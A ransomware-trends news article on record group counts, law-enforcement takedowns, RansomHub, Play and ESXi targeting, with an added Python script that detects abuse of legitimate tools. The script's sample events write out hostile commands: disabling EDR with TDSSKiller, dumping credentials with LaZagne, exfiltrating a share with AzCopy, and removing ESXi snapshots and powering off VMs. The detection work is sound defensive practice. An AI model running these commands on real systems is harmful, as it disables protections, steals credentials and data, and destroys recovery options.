This year has seen the highest number of active ransomware groups on record, with 58 attacking global businesses in the second quarter. Threat intelligence platform provider Cyberint has reported only a slight dip in the third quarter, with 57 active groups.
Furthermore, in Q3, the top 10 ransomware groups were responsible for only 58.3% of all detected attacks. This reflects both the rise in the number of active groups in general and a decline in activity from the larger players due to successful law enforcement takedowns, such as those of ALPHV and Dispossessor.
Adi Bleih, security researcher at Cyberint, told TechRepublic in an email: "The number of active ransomware groups having reached an all-time high means that businesses face an increased risk of attacks, as each of these competing gangs must now vie for targets. The competition between different ransomware groups has fuelled increasingly frequent attacks, leaving very little room for error on the part of enterprise cybersecurity teams.
"While security gaps and vulnerabilities may have previously gone unnoticed, the proliferation of ransomware groups, with all of them scouring the web for their next victims, means that even minor errors can now quickly lead to major security incidents."
The most prolific ransomware groups are succumbing to law enforcement operations
Indeed, separate research from WithSecure found that of the 67 ransomware groups tracked in 2023, 31 were no longer operational as of Q2 2024. NCC Group also noted a year-over-year decline in ransomware attacks in both June and July this year, which experts linked to the LockBit disruption.
SEE: LockBit Back Online as Ransomware Gang Continues to Clash with Law Enforcement
LockBit in particular used to account for the majority of attacks, but with only 85 attacks in the third quarter, it hit almost 60% fewer companies than it did in the second, according to Cyberint's report. This marks the group's lowest number of quarterly attacks in a year and a half.
An August report from Malwarebytes also found that the proportion of ransomware attacks that LockBit claimed responsibility for fell from 26% to 20% over the past year, despite the group carrying out more individual attacks.
ALPHV, the second-most prolific ransomware group, also left a vacancy after a sloppily executed cyber attack against Change Healthcare in February. The group did not pay an affiliate its share of the $22 million ransom, so the affiliate exposed the operators, prompting ALPHV to fake a law enforcement takeover and cease operations.
SEE: Timeline: 15 Notable Cyberattacks and Data Breaches
These observations suggest that law enforcement takedowns are proving effective against the more established gangs while simultaneously opening up new opportunities for smaller groups. The Malwarebytes analysts added that the new gangs "are bound to be trying to attract their affiliates and supplant them as the dominant forces in ransomware."
But Cyberint analysts are optimistic about the ripple effect of takedown operations on smaller players, writing: "As these large operations struggle, it's only a matter of time before other big and small ransomware groups follow the same path. The continued crackdown has created a more hostile environment for these groups, signaling that their dominance may not last much longer."
Indeed, instead of continuing the upward trend from the second quarter, when the number of ransomware attacks increased by almost 21.5%, the Cyberint researchers found that the 1,209 cases in Q3 actually marked a 5.5% decrease.
SEE: Global Cyber Attacks to Double from 2020 to 2024, Report Finds
The most prominent ransomware group of the quarter was RansomHub, which was responsible for 16.1% of all cases, claiming 195 new victims. Notable attacks include those on global manufacturer Kawasaki and oil and gas services company Halliburton. The Cyberint analysts say that the group's roots are likely in Russia and that it has connections to former affiliates of the now-inactive ALPHV group.
Second in the list of most active ransomware groups is Play, which claimed 89 victims and 7.9% of all cases. It has purportedly executed over 560 successful attacks since June 2022, with the most prominent one from this year targeting VMware ESXi environments.
"If not hindered, Play is going to break its own record of yearly victims in 2024 (301)," the analysts wrote.
Ransomware groups targeting Linux and VMware ESXi systems
The Cyberint report noted a trend of ransomware groups focusing heavily on Linux-based systems and VMware ESXi servers.
VMware ESXi is a bare-metal hypervisor that enables the creation and management of virtual machines directly on server hardware, and those virtual machines often include an organization's critical servers. Compromising the hypervisor lets attackers power off many virtual machines at once and remove recovery options such as snapshots, then encrypt the virtual disks on the datastore, ensuring significant impact on a business's operations. Because the hypervisor sits beneath the guests, endpoint agents running inside the VMs see nothing of the encryption, and snapshots stored on the same datastore as the disks they protect are not a backup.
Ransomware groups Play and Cicada3301 have developed ransomware that specifically targets VMware ESXi servers, while Black Basta has exploited vulnerabilities that allow it to encrypt all of the files belonging to the VMs.
SEE: Black Basta Ransomware Struck More Than 500 Organizations Worldwide
Linux systems also often host VMs and other critical business infrastructure. Such a focus highlights attackers' interest in the large payday available from inflicting maximum damage on corporate networks.
Attackers are using custom malware and abusing legitimate tools
The sophistication of ransomware groups' techniques has increased considerably over the past year, with Cyberint researchers observing attackers using custom malware to bypass security tools. For example, the Black Basta gang used a range of custom tools after gaining initial access to target environments.
Attackers are also abusing legitimate security and cloud storage tools to evade detection. RansomHub was observed using Kaspersky's TDSSKiller rootkit remover to disable endpoint detection and response (EDR) and the LaZagne password recovery tool to harvest credentials. In addition, several groups have used Microsoft's Azure Storage Explorer and AzCopy tools to steal corporate data and store it in cloud-based infrastructure. Because these binaries are signed and legitimately present in many environments, hash-based blocking does little; detection has to look at how they are invoked and in what sequence.
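Both behaviours described on this page, the abuse of legitimate tools on Windows endpoints and the hypervisor-level staging on ESXi from the previous section, leave traces in ordinary logs. The following is an added example written for this page, not Cyberint's, Malwarebytes' or any vendor's code: it runs simple command-line detections over constructed process-creation events (Sysmon event 1 or Windows 4688 style, assumed to carry `host`, `user` and `cmdline`) and over constructed lines in the ESXi `/var/log/shell.log` format. The TDSSKiller `-dcsvc` switch deletes a service by name, which is what makes the rootkit remover useful for killing EDR; the AzCopy rule looks for uploads to a blob endpoint; the ESXi rules flag snapshot removal outright and treat a burst of power-off commands as a mass shutdown. All host names, users, paths, storage account and VM IDs are invented, and the regexes are tuned to this sample rather than production-ready.

```python
"""Detect legitimate-tool abuse on Windows and ransomware staging on ESXi.

Added example for this article, not vendor code. All sample events below are
constructed; the log formats and field names are assumptions.
"""
import re
from collections import Counter, defaultdict

# --- Windows process-creation rules: (name, severity, regex over command line) ---
WINDOWS_RULES = [
    # TDSSKiller is a legitimate Kaspersky tool; "-dcsvc <name>" deletes a service,
    # which is how it gets turned against EDR services.
    ("edr_tamper_tdsskiller", "high",
     re.compile(r"tdsskiller(\.exe)?\b.*-dcsvc\s+\S+", re.I)),
    # LaZagne dumps stored credentials; "all" harvests every supported source.
    ("cred_harvest_lazagne", "high",
     re.compile(r"lazagne(\.exe)?\s+(all|browsers|windows|mails)\b", re.I)),
    # AzCopy copying local data to an Azure blob endpoint = possible exfiltration.
    ("exfil_azcopy_blob", "medium",
     re.compile(r"azcopy(\.exe)?\s+copy\b.*https://[\w.-]+\.blob\.core\.windows\.net", re.I)),
]


def scan_windows(events):
    """Return findings as (host, rule_name, severity) tuples.

    If EDR tampering and credential harvesting both fire on the same host, an
    extra 'critical' finding is added: that pairing is the RansomHub tradecraft
    described in the article, and either tool alone has benign uses.
    """
    findings = []
    hits_by_host = defaultdict(set)
    for ev in events:
        for name, severity, rx in WINDOWS_RULES:
            if rx.search(ev["cmdline"]):
                findings.append((ev["host"], name, severity))
                hits_by_host[ev["host"]].add(name)
    for host, names in hits_by_host.items():
        if {"edr_tamper_tdsskiller", "cred_harvest_lazagne"} <= names:
            findings.append((host, "chain_edr_kill_then_cred_theft", "critical"))
    return findings


# --- ESXi shell.log rules ---------------------------------------------------------
# ESXi records interactive shell commands as "<ts> shell[<pid>]: [<user>]: <cmd>".
SHELL_LINE = re.compile(r"^(?P<ts>\S+) shell\[\d+\]: \[(?P<user>[^\]]+)\]: (?P<cmd>.*)$")
SNAPSHOT_REMOVE = re.compile(r"vim-cmd\s+vmsvc/snapshot\.removeall\b")
POWER_OFF = re.compile(r"vim-cmd\s+vmsvc/power\.off\b|esxcli\s+vm\s+process\s+kill\b")
MASS_POWEROFF_THRESHOLD = 3  # tune per host; admins rarely stop 3+ VMs by hand in one session


def scan_esxi_shell_log(lines):
    """Return findings as (user, rule_name, severity) tuples.

    Snapshot removal is flagged on sight (it destroys the only on-host rollback).
    Power-off / process-kill commands are counted per user and reported as a
    mass shutdown once they reach MASS_POWEROFF_THRESHOLD.
    """
    findings = []
    poweroffs = Counter()
    for line in lines:
        m = SHELL_LINE.match(line)
        if not m:
            continue
        user, cmd = m.group("user"), m.group("cmd")
        if SNAPSHOT_REMOVE.search(cmd):
            findings.append((user, "esxi_snapshot_removeall", "high"))
        if POWER_OFF.search(cmd):
            poweroffs[user] += 1
    for user, n in poweroffs.items():
        if n >= MASS_POWEROFF_THRESHOLD:
            findings.append((user, f"esxi_mass_poweroff({n})", "critical"))
    return findings


# --- Constructed sample input (not real telemetry) -------------------------------
SAMPLE_WINDOWS_EVENTS = [
    {"host": "WS-ACCT-07", "user": "CORP\\jdoe",
     "cmdline": r"C:\Windows\System32\svchost.exe -k netsvcs"},
    {"host": "WS-ACCT-07", "user": "CORP\\jdoe",
     "cmdline": r"C:\Users\jdoe\AppData\Local\Temp\TDSSKiller.exe -dcsvc MBAMService"},
    {"host": "WS-ACCT-07", "user": "CORP\\jdoe",
     "cmdline": r"C:\Users\jdoe\AppData\Local\Temp\laZagne.exe all"},
    {"host": "FS-01", "user": "CORP\\svc_backup",
     "cmdline": r"azcopy.exe copy D:\Shares\Finance https://stg0examp1e.blob.core.windows.net/out --recursive"},
]
SAMPLE_ESXI_LOG = [
    "2024-09-10T02:14:03Z shell[2099831]: [root]: vim-cmd vmsvc/getallvms",
    "2024-09-10T02:14:09Z shell[2099831]: [root]: vim-cmd vmsvc/snapshot.removeall 12",
    "2024-09-10T02:14:10Z shell[2099831]: [root]: vim-cmd vmsvc/power.off 12",
    "2024-09-10T02:14:11Z shell[2099831]: [root]: vim-cmd vmsvc/power.off 13",
    "2024-09-10T02:14:12Z shell[2099831]: [root]: esxcli vm process kill --type=force --world-id=2100211",
    "2024-09-10T09:30:00Z shell[2100900]: [vmadmin]: vim-cmd vmsvc/power.off 7",
]

if __name__ == "__main__":
    for f in scan_windows(SAMPLE_WINDOWS_EVENTS) + scan_esxi_shell_log(SAMPLE_ESXI_LOG):
        print(f)
```

On the sample, the Windows scan yields the TDSSKiller, LaZagne and AzCopy hits plus the critical chain finding for WS-ACCT-07; the ESXi scan flags root's snapshot removal and a mass power-off of three VMs, while vmadmin's single power-off later in the day stays below the threshold. The point of the per-host correlation and the threshold is the caveat in the text above: every one of these tools and commands has a legitimate use, so the signal is in the combination and volume, not the binary.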
Bleih told TechRepublic: "As these gangs become more successful and well-funded, they become increasingly sophisticated and operate similarly to a legitimate business. While we often see the same tried-and-true attack vectors used – phishing attacks, the use of stolen credentials, exploitation of vulnerabilities on Internet-facing assets – they're becoming more creative in how they execute these common techniques.
"They're also becoming increasingly agile and scalable. For instance, while threat actors have always been technically adept, they're now able to start exploiting new vulnerabilities at scale just a few days after a critical CVE is documented. In the past, this may have taken weeks or perhaps longer."